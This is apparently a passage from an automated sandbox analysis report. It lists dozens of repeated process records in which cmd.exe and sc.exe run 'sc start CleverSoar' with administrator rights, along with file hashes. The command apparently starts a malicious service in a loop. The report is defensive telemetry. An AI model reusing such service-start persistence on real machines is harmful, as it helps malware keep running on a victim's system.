                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:28
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:29
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:30
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:31
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:32
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:33
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:34
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:35
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:36
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:37
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:38
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:39
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff7699e0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:40
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:41
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:42
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:43
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:44
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:45
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:46
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:47
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:48
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70f330000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:49
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:50
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:51
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:52
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:53
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:54
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:55
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:56
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:57
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:58
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:59
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:60
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:61
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:62
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:63
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:64
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:65
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:66
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:67
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:68
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:69
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:70
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:71
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:72
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:73
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:74
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:75
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:76
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:77
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:78
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:79
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:80
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:81
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:82
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:83
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:84
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:85
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:86
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:87
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:88
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:89
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:90
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:91
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:92
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:93
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
